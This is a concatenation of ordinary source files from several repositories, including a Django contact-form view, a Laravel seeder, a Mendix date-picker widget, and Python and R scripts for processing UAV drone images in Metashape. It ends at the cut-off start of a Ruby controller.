from django.core.mail import BadHeaderError, send_mail
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib import messages
def index(request, context=None):
    """Render the landing page and handle contact-form submissions.

    When the POST data contains ``from_email``, the inquiry is mailed
    synchronously and the template is informed via ``email_just_sent``.
    """
    if request.POST.get('from_email'):  # got a post request from the contact form
        # Fix: this previously called the undefined name ``send_email_``,
        # raising NameError on every contact-form submission.
        send_email(request)  # sends mail right now, not async
        context = {'email_just_sent': True}
    return render(request=request, template_name='index.html', context=context)
def login(request):
    """Render the login page.  (Leftover debug print removed.)"""
    return render(request, template_name='login.html')
'''
Custom controller that for urls.py.
'''
'''
def route(request,template, model=None, object_list=None,context=None):
#template=context['template']
#print('{}'.format(model.objects.all())) #works!.
#dict = {'object_list':object_list}
#context = RequestContext(request,dict)
if request.POST.get('from_email'): # got a post request from the contact_form
send_email(request)
context={'email_just_sent':True}
return render(request=request,template_name=template,context=context)
'''
def send_email(request):
    '''
    Mail a contact-form inquiry to the site mailbox.

    Reads ``message`` and ``from_email`` from the POST data.  Returns an
    error response on a bad header, otherwise None.
    '''
    body = request.POST.get('message', '')
    reply_to = request.POST.get('from_email', '')
    try:
        send_mail('Avvebo Form Inquiry', body, '<EMAIL>', [reply_to])
    except BadHeaderError:
        return HttpResponse('Invalid header found.')
| 2fcf2e18e695fb96f76f3cccfd95dc818e6b5502 | [
"Python"
] | 5 | Python | gmar1274/Avvebo | be77f0276b59d789fa64f733bb34b36517e9f233 | 05bfbe5a04b648feb80bd32c37f358d3dbdb0b0c |
refs/heads/master | <file_sep><?php
namespace Database\Seeders;
use App\Models\Answer;
use App\Models\User;
use App\Models\Question;
use Illuminate\Database\Seeder;
class DatabaseSeeder extends Seeder
{
    /**
     * Seed the application's database.
     *
     * Creates 10 users; each user receives a random number (3-10) of
     * questions, and each question a random number (3-10) of answers.
     *
     * @return void
     */
    public function run()
    {
        $seedAnswers = function ($question) {
            Answer::factory()
                ->count(rand(3, 10))
                ->for($question)
                ->create();
        };

        $seedQuestions = function ($user) use ($seedAnswers) {
            Question::factory()
                ->count(rand(3, 10))
                ->for($user)
                ->create()
                ->each($seedAnswers);
        };

        User::factory(10)->create()->each($seedQuestions);
    }
}
| 80d5162f1f2462e41e14e30fd5e740b4b286e2f5 | [
"PHP"
] | 1 | PHP | dhiyaaulauliyaa/laravel-qa | 946323a867931e350dc12c37d548fc8783e4478d | 113dc2b984ffca8aac1a5d4153184da579e57bc7 |
refs/heads/master | <repo_name>mendixlabs/PickADayWidget<file_sep>/README.md
# PickADayWidget
This is a date picker widget for Mendix. It adds support for inline editing of a date (its DOM structure differs from the standard Mendix date picker).
## Contributing
For more information on contributing to this repository visit [Contributing to a GitHub repository](https://docs.mendix.com/howto50/contributing-to-a-github-repository).
## Dependencies
- [Pikaday](https://github.com/dbushell/Pikaday), modified version. MIT & BSD License.
- [Momentjs](momentjs.com) 2.17.1. MIT License
## Features
This is a Mendix implementation of the Pikaday library
## Configuration
### Data Source
#### Date Attribute
Attribute. Should be of type `DateTime`.
#### Date format
This is the date format that the widget uses (formatting comes from Moment.js). Note: this is different from the placeholder used in Appearance.
### Appearance
#### Show button
Show a button next to the text-field.
#### Button Class
Glyphicon button class. The icon has class "glyphicon glyphicon-" and this class name.
#### Placeholder
Placeholder text used in the input field.
#### Show days outside month
Show the days that are within a week but outside the current month.
#### Show label
Show a label in front of the input field.
#### Label text
Text for the label.
#### Prev month button
Glyphicon button class. The icon has class "glyphicon glyphicon-" and this class name. If you leave this empty, the standard buttons defined in the CSS file are used.
#### Next month button
Glyphicon button class. The icon has class "glyphicon glyphicon-" and this class name. If you leave this empty, the standard buttons defined in the CSS file are used.
### Behavior
##### On Change Microflow
The microflow to execute when the value changes.
##### Click outside month
Make dates outside the current month clickable.
##### Trigger on focus
Keep this set to false if you are using a button. This prevents the calendar from opening unexpectedly when the input field receives focus, which can be annoying when, for example, an on change microflow is used.
##### Disable weekend days
Disable the selection of weekend days (Saturday and Sunday).
## License
This project is licensed under the Apache License v2 (for details, see the [LICENSE](LICENSE) file).
<file_sep>/src/PickADayWidget/widget/PickADayWidget.js
define([
"dojo/_base/declare",
"mxui/widget/_WidgetBase",
"mxui/dom",
"dojo/dom",
"dojo/dom-class",
"dojo/dom-style",
"dojo/dom-attr",
"dojo/dom-construct",
"dojo/_base/array",
"dojo/_base/lang",
"dojo/_base/event",
"dojo/on",
"dojo/html",
"PickADayWidget/lib/pikaday",
"PickADayWidget/lib/moment"
], function(declare, _WidgetBase, dom, dojoDom, dojoClass, dojoStyle, dojoAttr, dojoConstruct, dojoArray, lang, dojoEvent, dojoOn, dojoHtml, PickADay, moment) {
"use strict";
var $ = dojoConstruct.create;
return declare("PickADayWidget.widget.PickADayWidget", [_WidgetBase], {
        // DOM nodes created in _addElements.
        _inputNode: null,
        _calendarButton: false,
        // Widget properties configured in the Mendix Modeler (defaults below).
        dateAttr: "",
        showButton: true,
        buttonClass: "calendar",
        dateFormat: "MM/DD/YYYY",
        placeholderText: "MM/DD/YYYY",
        showDaysOutsideMonth: true,
        showLabel: false,
        labelText: "",
        onChangeMF: "",
        clickOutsideMonth: true,
        disableWeekend: false,
        triggerFocus: false,
        prevButtonClass: "minus",
        nextButtonClass: "plus",
        // Internal state.
        _picker: null,
        _handles: null,
        _contextObj: null,
        _stayHidden: false,
        constructor: function() {
            // Per-instance array (created here so instances never share state).
            this._handles = [];
        },
        postCreate: function() {
            // Mendix lifecycle hook: runs once after the DOM node is created.
            logger.debug(this.id + ".postCreate");
            // The editable state can be flagged through several Mendix properties.
            if (this.readOnly || this.get("disabled") || this.readonly) {
                this._readOnly = true;
            }
            this.setNative = false; // TODO: After thorough testing, add this as an option to the modeler
            this.calendarMode = "inline"; // TODO: Add modal option
            dojoClass.add(this.domNode, "mx-dateinput pickaDay-widget form-group", true);
            this._addElements();
            // Track input focus/blur/change; this.own() ties the handles to the widget lifecycle.
            this.own(dojoOn(this._inputNode, "focus", lang.hitch(this, this._onFocus)));
            this.own(dojoOn(this._inputNode, "blur", lang.hitch(this, this._onBlur)));
            this.own(dojoOn(this._inputNode, "change", lang.hitch(this, this._onChange)));
        },
_onFocus: function () {
dojoAttr.set(this._inputNode, "type", this.setNative ? "date" : "text");
},
_onBlur: function () {
dojoAttr.set(this._inputNode, "type", "text");
},
        _onChange: function (e) {
            // Log-only for now; committing the value happens in _onSelect.
            logger.debug(this.id + "._onChange");
        },
        _addElements: function () {
            // Build the widget DOM: optional label, optional calendar button,
            // the text input, and (when editable) the Pikaday calendar.
            logger.debug(this.id + "._addElements");
            var rootNode = this.domNode;
            if (this.showLabel) {
                $("label", {
                    class: "control-label",
                    innerHTML: this.labelText
                }, this.domNode);
                // When a label is shown, the controls live in a nested form-group.
                rootNode = $("div", {
                    class: "form-group"
                }, this.domNode);
            }
            if (this.showButton) {
                this._calendarButton = $("button", {
                    type: "button",
                    class: "btn mx-button mx-dateinput-select-button pickaDay-button"
                }, rootNode);
                $("span", {
                    class: "glyphicon glyphicon-" + this.buttonClass
                }, this._calendarButton);
            }
            var wrapper = $("div", {
                class: "mx-dateinput-input-wrapper"
            }, rootNode);
            this._inputNode = $("input", {
                type: "text",
                class: "form-control mx-dateinput-input",
                placeHolder: this.placeholderText
            }, wrapper);
            var pickerWrapper = $("div", {
                class: "pickerCalendar"
            }, this.domNode);
            if (!this._readOnly) {
                // Instantiate Pikaday wired to the input, optional trigger
                // button, and the widget's open/select/close/key callbacks.
                this._picker = new PickADay({
                    field: this._inputNode,
                    trigger: this._calendarButton,
                    container: pickerWrapper,
                    onOpen: lang.hitch(this, this._onOpen),
                    onSelect : lang.hitch(this, this._onSelect),
                    onClose : lang.hitch(this, this._onClose),
                    onKey: lang.hitch(this, this._onKey),
                    triggerFocus: this.triggerFocus,
                    format: this.dateFormat,
                    showDaysInNextAndPreviousMonths: this.showDaysOutsideMonth,
                    clickOutsideMonth: this.clickOutsideMonth,
                    theme: "mendix-pickaday",
                    buttonPrev: this.prevButtonClass ? "<div class=\"glyphicon glyphicon-" + this.prevButtonClass + "\"></div>" : null,
                    buttonNext: this.nextButtonClass ? "<div class=\"glyphicon glyphicon-" + this.nextButtonClass + "\"></div>" : null,
                    disableWeekends: this.disableWeekend,
                    disableDayFn: function (day) {
                        // No extra per-day disabling beyond the weekend option.
                        return false;
                    }
                });
                this._picker.hide();
            }
        },
        _onSelect: function (date) {
            // Pikaday callback: commit the picked date to the context object
            // and run the configured on-change microflow, if any.
            logger.debug(this.id + "._onSelect :: ", date);
            if (date) {
                this._contextObj.set(this.dateAttr, date);
                if (this.onChangeMF) {
                    // NOTE(review): _execMf is presumably defined further down
                    // in this file (outside this excerpt) — confirm.
                    this._execMf(this.onChangeMF, this._contextObj.getGuid());
                }
            }
        },
_onKey: function (e) {
// called when key is pressed and picker is visible
switch(e.keyCode){
case 13:
case 27:
e.preventDefault();
this._picker.hide();
break;
}
},
_onOpen: function () {
logger.debug(this.id + "._onOpen");
dojoClass.toggle(this.domNode, "open", true);
},
_onClose: function () {
logger.debug(this.id + "._onClose");
dojoClass.toggle(this.domNode, "open", false);
},
update: function(obj, callback) {
logger.debug(this.id + ".update");
this._contextObj = obj;
this._resetSubscriptions();
this._updateRendering(callback);
},
resize: function(box) {
logger.debug(this.id + ".resize");
},
uninitialize: function() {
logger.debug(this.id + ".uninitialize");
if (this._picker) {
this._picker.destroy();
}
},
_resetSubscriptions: function () {
logger.debug(this.id + "._resetSubscriptions");
this.unsubscribeAll();
if (this._contextObj) {
this.subscribe({
guid: this._contextObj.getGuid(),
callback: lang.hitch(this, function (guid) {
logger.debug(this.id + " Object subscription fired, guid: " + guid);
this._updateRendering();
})
});
this.subscribe({
guid: this._contextObj.getGuid(),
attr: this.dateAttr,
callback: lang.hitch(this, function (guid, attr, attrValue) {
logger.debug(this.id + " Attr subscription fired");
this._updateRendering();
})
});
this.subscribe({
guid: this._contextObj.getGuid(),
val: true,
callback: lang.hitch(this, function (validations) {
logger.debug(this.id + " Validation subscription fired");
this._handleValidation(validations, this.dateAttr);
})
});
}
},
// Handle validations.
_handleValidation: function (validations, attribute) {
logger.debug(this.id + "._handleValidation");
this._clearValidations();
var validation = validations[0],
message = validation.getReasonByAttribute(attribute);
if (this._readOnly) {
validation.removeAttribute(attribute);
} else if (message) {
this._addValidation(message);
validation.removeAttribute(attribute);
}
},
// Clear validations.
_clearValidations: function () {
logger.debug(this.id + "._clearValidations");
dojoConstruct.destroy(this._alertDiv);
this._alertDiv = null;
},
// Show an error message.
_showError: function (message) {
logger.debug(this.id + "._showError");
if (this._alertDiv !== null) {
dojoHtml.set(this._alertDiv, message);
return true;
}
this._alertDiv = dojoConstruct.create("div", {
"class": "alert alert-danger",
"innerHTML": message
});
dojoConstruct.place(this._alertDiv, this.domNode);
},
// Add a validation.
_addValidation: function (message) {
logger.debug(this.id + "._addValidation");
this._showError(message);
},
_updateRendering: function(callback) {
logger.debug(this.id + "._updateRendering");
if (this._contextObj !== null) {
dojoStyle.set(this.domNode, "display", "block");
var date = new Date(this._contextObj.get(this.dateAttr));
if (!isNaN(date.getTime())) {
this._picker.setDate(date, true);
}
} else {
dojoStyle.set(this.domNode, "display", "none");
}
this._clearValidations();
this._executeCallback(callback, "_updateRendering");
},
_execMf: function (mf, guid, cb) {
logger.debug(this.id + "._execMf");
if (mf && guid) {
mx.ui.action(mf, {
params: {
applyto: "selection",
guids: [guid]
},
callback: lang.hitch(this, function (objs) {
logger.debug(this.id + "._execMf cb");
if (cb && typeof cb === "function") {
cb(objs);
}
}),
error: function (error) {
console.debug(error.description);
}
}, this);
}
},
_executeCallback: function (cb, from) {
logger.debug(this.id + "._executeCallback" + (from ? " from " + from : ""));
if (cb && typeof cb === "function") {
cb();
}
}
});
});
require(["PickADayWidget/widget/PickADayWidget"]);
| 9c5979e22704ab50f9422b30a62cb7fcd83d3d5f | [
"Markdown",
"JavaScript"
] | 2 | Markdown | mendixlabs/PickADayWidget | 7bbef87dfa879be1497f7eddc57399d674e701bc | 67218e9a804b05ddfd0255d46f39658fdda27587 |
refs/heads/master | <repo_name>Nature40/UAV-Processing<file_sep>/metashapeToolbox/metashapeTools/msSparseCloud.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 4 10:00:09 2019
@author: marvin
"""
import Metashape
def createSparse(chunk, doc = Metashape.app.document, kpl = 40000, tpl = 4000):
# align photos
chunk.matchPhotos(downscale = 1, reference_preselection = True,
keypoint_limit = kpl, tiepoint_limit = tpl)
chunk.alignCameras(adaptive_fitting = True)
chunk.resetRegion()
# save document
doc.read_only = False
doc.save()
def filterSparse(chunk, doc = Metashape.app.document):
MF = Metashape.PointCloud.Filter()
# Reconstruction Accuracy Filter
for i in range(3-1):
MF.init(chunk, Metashape.PointCloud.Filter.ReconstructionUncertainty)
MF.selectPoints(50)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy = True, fit_b1=True, fit_b2 = True, fit_k1 = True, fit_k2 = True, fit_k3 = True, fit_k4=True, fit_p1 = True, fit_p2 =True)
chunk.resetRegion()
# Reprojection Error Filter
for i in range(4-1):
MF.init(chunk, Metashape.PointCloud.Filter.ReprojectionError)
MF.selectPoints(1)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy = True, fit_b1=True, fit_b2 = True, fit_k1 = True, fit_k2 = True, fit_k3 = True, fit_k4=True, fit_p1 = True, fit_p2 =True)
chunk.resetRegion()
# Projection Accuracy Filter
for i in range(2-1):
MF.init(chunk, Metashape.PointCloud.Filter.ProjectionAccuracy)
MF.selectPoints(10)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy = True, fit_b1=True, fit_b2 = True, fit_k1 = True, fit_k2 = True, fit_k3 = True, fit_k4=True, fit_p1 = True, fit_p2 =True)
chunk.resetRegion()
#------------------------------------------------------------------------
def exportSparse(chunk, doc = Metashape.app.document):
outpath = doc.path[:-4] # project path without file extension
crs = Metashape.CoordinateSystem("EPSG::25832")
# export filtered tiepoints
chunk.exportPoints(str(outpath + "_" + str(chunk.label) + "_tiepoints.las"), source_data = Metashape.DataSource.PointCloudData, save_colors = True, crs = crs)
# save document
doc.read_only = False
doc.save()
<file_sep>/uavImagetoolsR/seamlineClean.R
#' Seamline cutter
#'
#' @description Removes the distorted outer parts of the seamlines
#'
#' @param img sf, image exif data from imgExif
#' @param seam sf, seamline export from Metashape
#'
#' @import sf
#' @import stringr
#' @import concaveman
#'
#'
#'
seamlineClean = function(img, seam){
# concave hull of images
ch = concaveman::concaveman(img, concavity = 4)
# buffer -10 m
ch = sf::st_buffer(ch, dist = -10)
# check if image positions is 10 m inside the convex hull
img$inside = t(sf::st_contains(ch, img, sparse = FALSE))
# remove the last 4 character from string (file ending and .)
img$name = stringr::str_sub(img$FileName, end = -5)
# throw away outer seamlines
seam_cut = seam[seam$NAME %in% img$name[img$inside],]
return(seam_cut)
}
<file_sep>/uavImagetoolsR/imgGrid.R
#' Sample Image Grid
#' @description Samples a regular grid with equal distance between the images
#'
#' @param imgBB the bounding box to sample
#' @param gridsize distance between the images
#'
#' @return points with regular image location
#'
#' @author <NAME>
#'
#' @export
#
imgGrid = function(imgBB, gridsize){
# make sure imgBB is in UTM format
imgBB = st_transform(imgBB, crs = 25832)
# sample regular grid
s = sf::st_make_grid(imgBB, cellsize = gridsize, what = "centers")
# crop to optimal bounding box
s = st_intersection(s, imgBB)
s = st_transform(s, crs = 4326)
return(s)
}
<file_sep>/uavImagetoolsR/imgFilter.R
#' Sample Images
#' @description Images at sample poitns
#'
#' @param images bla
#'
#' @return
#'
#' @import sf
#'
#' @author <NAME>
#'
#' @export
#
sampleImages <- function(images, task, spacing = 20){
t = sampleTask(task, spacing)
s = st_nearest_feature(task, images)
img_sample = images[s,]
return(img_sample)
}
<file_sep>/uavImagetoolsR/imgExif.R
#' Read Exif from one mission
#' @description Reads the exif data from all images of a flight and returns them as points
#'
#' @param imgPath directory with the images
#'
#' @return sf points of image positions
#'
#' @import exifr
#' @import sf
#'
#' @author <NAME>
#'
#' @export
imgExif <- function(imgPath){
# read exif data from images with important exif tags
img_exif <- exifr::read_exif(imgPath, recursive = TRUE, tags = c("SourceFile", "Directory", "FileName", "DateTimeOriginal",
"GPSLongitude", "GPSLatitude", "GPSAltitude"))
# remove points with no GPS signal
img_exif <- img_exif[!is.na(img_exif$GPSLatitude),]
# timestamp as POSIXct, order images by date
img_exif$time <- as.POSIXct(img_exif$DateTimeOriginal, format = "%Y:%m:%d %H:%M:%S")
img_exif <- img_exif[order(img_exif$time),]
# add geometry information
img_exif <- sf::st_as_sf(img_exif, coords = c("GPSLongitude", "GPSLatitude", "GPSAltitude"), crs = 4326 ,dim = "XYZ")
return(img_exif)
}
<file_sep>/metashapeToolbox/msTC_01.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 29 09:06:49 2019
@author: um2
"""
import Metashape
import metashapeTools.msSparseCloud as mt
for chunk in Metashape.app.document.chunks:
mt.createSparse(chunk)<file_sep>/uavImagetoolsR/taskSample.R
#' Sample points along the flight path
#' @description Samples regular spaced points along the UAV flight path
#'
#' @param task sf points from \code{\link[readTask]{readTask}}
#' @param spacing distance between the sample points
#'
#' @return
#'
#' @author <NAME>
#'
#' @import dplyr
#' @import sf
#'
#' @export
#
sampleTask <- function(task, spacing = 20){
# convert to line
l = task %>% dplyr::summarise(do_union = FALSE) %>% sf::st_cast("LINESTRING")
# sample regular grid
l = sf::st_sample(l, size = as.numeric(round(sf::st_length(l) / spacing)), type = "regular")
l = st_cast(l, to = "POINT")
return(l)
}
<file_sep>/metashapeToolbox/metashapeTools/msDenseCloud.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 12 13:32:25 2019
@author: um2
"""
# import markers
import Metashape
import sys
# control: do with all chunks or just the active one
allchunks = sys.argv[1]
# Here starts the process after the GCP were set and corrected.
# Start with point cloud filtering and then build the densecloud
def filterSparse(chunk, doc = Metashape.app.document):
chunk.resetRegion()
MF = Metashape.PointCloud.Filter()
# Reconstruction uncertanty
MF.init(chunk, Metashape.PointCloud.Filter.ReconstructionUncertainty)
MF.selectPoints(50)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cxcy=True, fit_aspect=True, fit_skew=True, fit_k1k2k3=True, fit_p1p2=True, fit_k4=True)
chunk.resetRegion()
# Reprojection Error Filter
MF.init(chunk, Metashape.PointCloud.Filter.ReprojectionError)
MF.selectPoints(0.9)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cxcy=True, fit_aspect=True, fit_skew=True, fit_k1k2k3=True, fit_p1p2=True, fit_k4=True)
chunk.resetRegion()
# Projection Accuracy Filter
MF.init(chunk, Metashape.PointCloud.Filter.ProjectionAccuracy)
MF.selectPoints(10)
chunk.point_cloud.removeSelectedPoints()
chunk.optimizeCameras(fit_f=True, fit_cxcy=True, fit_aspect=True, fit_skew=True, fit_k1k2k3=True, fit_p1p2=True, fit_k4=True)
chunk.resetRegion()
# save document
doc.read_only = False
doc.save()
def createDenseCloud(chunk, doc = Metashape.app.document):
# build depth maps with moderate filter
chunk.buildDepthMaps(quality = Metashape.Quality.HighQuality, filter = Metashape.FilterMode.ModerateFiltering, reuse_depth=True)
# build dense cloud
chunk.buildDenseCloud(point_colors=True, keep_depth=True)
doc.read_only = False
doc.save()
# control: do with all chunks or just the active one
def createDenseCloudControl(allchunks):
print(allchunks)
if allchunks == "1":
for i in Metashape.app.document.chunks:
filterSparse(chunk = i)
createDenseCloud(chunk = i)
else:
filterSparse(chunk = Metashape.app.document.chunk)
createDenseCloud(chunk = Metashape.app.document.chunk)
# RUN CONTROL
createDenseCloudControl(allchunks)
<file_sep>/metashapeToolbox/msTC_02.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 29 09:08:10 2019
@author: um2
"""
import Metashape
import metashapeTools.msSparseCloud as mt
import metashapeTools.msOrtho as mo
for chunk in Metashape.app.document.chunks:
mt.filterSparse(chunk)
mt.exportSparse(chunk)
mo.sparse2ortho(chunk)
mo.exportOrtho(chunk)
<file_sep>/metashapeToolbox/metashapeTools/msOrtho.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 8 09:47:53 2019
@author: marvin
"""
import Metashape
# control: do with all chunks or just the active one
def sparse2ortho(chunk, doc = Metashape.app.document, orthoRes = 0.05):
# create mesh
chunk.resetRegion()
chunk.buildModel(surface_type=Metashape.SurfaceType.HeightField, source_data = Metashape.DataSource.PointCloudData,
interpolation = Metashape.Interpolation.EnabledInterpolation, face_count = Metashape.FaceCount.HighFaceCount)
chunk.smoothModel(35)
doc.save()
# build ortho
chunk.resetRegion()
chunk.buildOrthomosaic(surface_data=Metashape.ModelData, resolution = orthoRes)
doc.save()
#def dense2ortho(chunk, doc = Metashape.app.document, orthoRes = 0.05):
def exportOrtho(chunk, doc = Metashape.app.document, orthoRes = 0.05):
outpath = doc.path[:-4] # project path without file extension
# export ortho
chunk.resetRegion()
chunk.exportRaster(str(outpath + "_" + str(chunk.label) + "_orthomosaic.tif"),
raster_transform = Metashape.RasterTransformNone,save_alpha=False,
white_background=True, resolution = orthoRes, source_data = Metashape.DataSource.OrthomosaicData)
# save document
doc.read_only = False
doc.save()
# create report
chunk.exportReport(outpath + "_" + chunk.label + "_report.pdf")
def exportSeamlines(chunk, doc = Metashape.app.document):
outpath = doc.path[:-4]
chunk.buildSeamlines(epsilon = 0)
# save document
doc.read_only = False
doc.save()
chunk.exportShapes(path = str(outpath + "_" + str(chunk.label) + "_seamlines.geojson"), save_polygons = True)
<file_sep>/uavImagetoolsR/taskRead.R
#' Read UAV Task
#'
#' @description Reads a UAV mavlink flight task and converts to sf points
#'
#' @param taskfile filepath of the task
#'
#' @author <NAME>
#'
#' @import sf
#' @export
#'
taskRead <- function(taskfile){
t <- read.table(taskfile, skip = 1, header = FALSE)
# filter waypoints
t <- t[t$V9 != 0,]
# cut of taxi way
t <- t[c(which(t$V1 == 7):nrow(t)),]
t <- sf::st_as_sf(t, coords = c("V10", "V9"), dim = "XY",crs = 4326)
return(t)
}
<file_sep>/uavImagetoolsR/boundingBox.R
#' Rectangle area around points
#'
#' Creates optimal rectangle bounding box around points
#'
#' @param points a sf object, points
#' @param buffer buffer distance between the points and the rectangle; defaults 0
#' @param epsg projection of the output polygon
#'
#' @return sf polygon
#'
#' @author <NAME>
#'
#' @details The code is based on a Rotating Caliper Algorithm and mostly copy and pasted (see reference)
#'
#' @references http://dwoll.de/rexrepos/posts/diagBounding.html
#'
#' @export
boundingBox <- function(points, buffer = 0, epsg = 4326){
# #-------------------------------------------------------
# here starts the copies algorithm from:
# http://dwoll.de/rexrepos/posts/diagBounding.html
optimalBB <- function(xy){
stopifnot(is.matrix(xy), is.numeric(xy), nrow(xy) >= 2, ncol(xy) == 2)
## rotating calipers algorithm using the convex hull
H <- chull(xy) ## hull indices, vertices ordered clockwise
n <- length(H) ## number of hull vertices
hull <- xy[H, ] ## hull vertices
## unit basis vectors for all subspaces spanned by the hull edges
hDir <- diff(rbind(hull, hull[1, ])) ## hull vertices are circular
hLens <- sqrt(rowSums(hDir^2)) ## length of basis vectors
huDir <- diag(1/hLens) %*% hDir ## scaled to unit length
## unit basis vectors for the orthogonal subspaces
## rotation by 90 deg -> y' = x, x' = -y
ouDir <- cbind(-huDir[ , 2], huDir[ , 1])
## project hull vertices on the subspaces spanned by the hull edges, and on
## the subspaces spanned by their orthogonal complements - in subspace coords
projMat <- rbind(huDir, ouDir) %*% t(hull)
## range of projections and corresponding width/height of bounding rectangle
rangeH <- matrix(numeric(n*2), ncol=2) ## hull edge
rangeO <- matrix(numeric(n*2), ncol=2) ## orthogonal subspace
widths <- numeric(n)
heights <- numeric(n)
for(i in seq(along=numeric(n))) {
rangeH[i, ] <- range(projMat[ i, ])
## the orthogonal subspace is in the 2nd half of the matrix
rangeO[i, ] <- range(projMat[n+i, ])
widths[i] <- abs(diff(rangeH[i, ]))
heights[i] <- abs(diff(rangeO[i, ]))
}
## extreme projections for min-area rect in subspace coordinates
## hull edge leading to minimum-area
eMin <- which.min(widths*heights)
hProj <- rbind( rangeH[eMin, ], 0)
oProj <- rbind(0, rangeO[eMin, ])
## move projections to rectangle corners
hPts <- sweep(hProj, 1, oProj[ , 1], "+")
oPts <- sweep(hProj, 1, oProj[ , 2], "+")
## corners in standard coordinates, rows = x,y, columns = corners
## in combined (4x2)-matrix: reverse point order to be usable in polygon()
## basis formed by hull edge and orthogonal subspace
basis <- cbind(huDir[eMin, ], ouDir[eMin, ])
hCorn <- basis %*% hPts
oCorn <- basis %*% oPts
pts <- t(cbind(hCorn, oCorn[ , c(2, 1)]))
## angle of longer edge pointing up
dPts <- diff(pts)
e <- dPts[which.max(rowSums(dPts^2)), ] ## one of the longer edges
eUp <- e * sign(e[2]) ## rotate upwards 180 deg if necessary
deg <- atan2(eUp[2], eUp[1])*180 / pi ## angle in degrees
pts <- rbind(pts, pts[1,])
return(pts)
}
#----------#-----------#------------#----------------#
#-----------#------------#-------------#-------------#
# input and conversion
#--------------------------
xy <- do.call(rbind, st_geometry(points))
# call the Rotating Caliper Algorithm
pts <- optimalBB(xy)
# convert to polygon
sf_pts <- st_sfc(st_polygon(list(pts)), crs = st_crs(points))
# square buffer
pts_buffer <- st_buffer(sf_pts, dist = buffer, nQuadSegs = 40, endCapStyle = "FLAT",
joinStyle = "MITRE", mitreLimit = Inf)
pts_buffer <- st_sfc(pts_buffer, crs = st_crs(points))
pts_buffer <- st_transform(pts_buffer, crs = epsg)
# return spatial object
return(pts_buffer)
}
<file_sep>/metashapeToolbox/msPurgeImages.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 4 10:00:09 2019
@author: marvin
"""
import Metashape
# import sys
import glob
import os
# control: do with all chunks or just the active one
# allchunks = sys.argv[1]
def purgeImages(chunk, doc = Metashape.app.document):
# get list of all images in chunk
usedImg = []
for c in chunk.cameras:
usedImg.append(c.photo.path)
# get all images
allImg = glob.glob(os.path.dirname(usedImg[0]) + "/*.JPG")
rmImg = set(allImg) - set(usedImg)
# confirmation prompt
confirm_msg = "Remove unused Cameras from Harddrive? Yes = 1, No = 0"
confirm = Metashape.app.getInt(confirm_msg ,0)
if (confirm == 1):
for i in rmImg:
os.remove(i)
print("Removed images")
else:
print("Deleting images needs confirmation!")
# run function
purgeImages(chunk = Metashape.app.document.chunk)
<file_sep>/README.md
# UAV-Processing
Collection of Python and R Scripts for UAV image processing.
## Metashape Toolbox
The Metashape Toolbox contains workflows for the creation of orthomosaics with Agisoft Metashape.
The workflows consists of Metashape Modules with preconfigured parameters to establish a standardized processing of UAV images.
Create a toolchain with functions you find in metashapeTools:
```{python}
import Metashape
import metashapeTools.msSparseCloud as sp
import metashapeTools.msOrtho as ot
chunk = Metashape.app.document.chunk()
# align images and create sparse cloud
mt.createSparse(chunk)
# filter the sparse cloud (ReconstructionUncertainty, ReprojectionError, ProjectionAccuracy)
mt.filteSparse(chunk)
# create a mesh and a orthomosaic
ot.sparse2Ortho(chunk)
```
## R imagetools
Contains functions to read flight tasks, read exif data and sample/filter images.
<file_sep>/metashapeToolbox/msSubsetImages.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# script version 0.2.1
# source: https://www.agisoft.com/forum/index.php?topic=5681.0
import Metashape
chunk = Metashape.app.document.chunk
step = Metashape.app.getInt("Specify the selection step:" ,2)
index = 1
for camera in chunk.cameras:
if not (index % step):
camera.selected = True
else:
camera.selected = False
index += 1
<file_sep>/metashapeToolbox/msExportTiepointError.py
import Metashape
import csv
# export the coordinates into a python list X Y Z
def getPointCoords(chunk):
# source: https://www.agisoft.com/forum/index.php?topic=11218.0
# init result lists
pX, pY, pZ, = [],[],[]
for point in chunk.point_cloud.points:
cov = point.cov
coord = point.coord
V = chunk.transform.matrix * point.coord
V.size = 3
X, Y, Z = chunk.crs.project(V)
pX.append(X)
pY.append(Y)
pZ.append(Z)
return([pX,pY,pZ])
def getErrors(chunk):
MF = Metashape.PointCloud.Filter()
MF.init(chunk, Metashape.PointCloud.Filter.ReconstructionUncertainty)
RU = MF.values
MF.init(chunk, Metashape.PointCloud.Filter.ReprojectionError)
RE = MF.values
MF.init(chunk, Metashape.PointCloud.Filter.ProjectionAccuracy)
PA = MF.values
MF.init(chunk, Metashape.PointCloud.Filter.ImageCount)
IC = MF.values
return([RU,RE,PA,IC])
def writeErrors(chunk, filename):
# create file header colnames
fheader = ["x","y","z","RU","RE","PA","IC"]
# call both functions for values
res = getPointCoords(chunk) + getErrors(chunk)
# transpose output for csv writing
res = list(map(list, zip(*res)))
# open file connection and write line by line
f = open(filename, "w")
w = csv.writer(f)
w.writerow(fheader)
w.writerows(res)
f.flush()
f.close()
def msExportTiepointError(chunk, filename = None):
# create a filename of not specified
if not filename:
filename = str(Metashape.app.document.path[:-4] + "_" + str(chunk.label) + "tiepoint_errors.txt")
writeErrors(chunk, filename)
for chunk in Metashape.app.document.chunks:
msExportTiepointError(chunk)
| f71a732d825400c643f246944349001dfa74cf15 | [
"Markdown",
"Python",
"R"
] | 16 | Python | Nature40/UAV-Processing | 916e417e92ef568f3aa35f222d3f2ca95279c03b | a424180af111f2daa473ccccb4840bd60deb5a0e |
refs/heads/master | <file_sep>module Houston
module Scheduler
class TicketsController < ApplicationController
def update
@ticket = Ticket.find(params[:id])
@project = ticket.project
extended_attributes = @ticket.extended_attributes
if params.key?(:estimatedEffort)
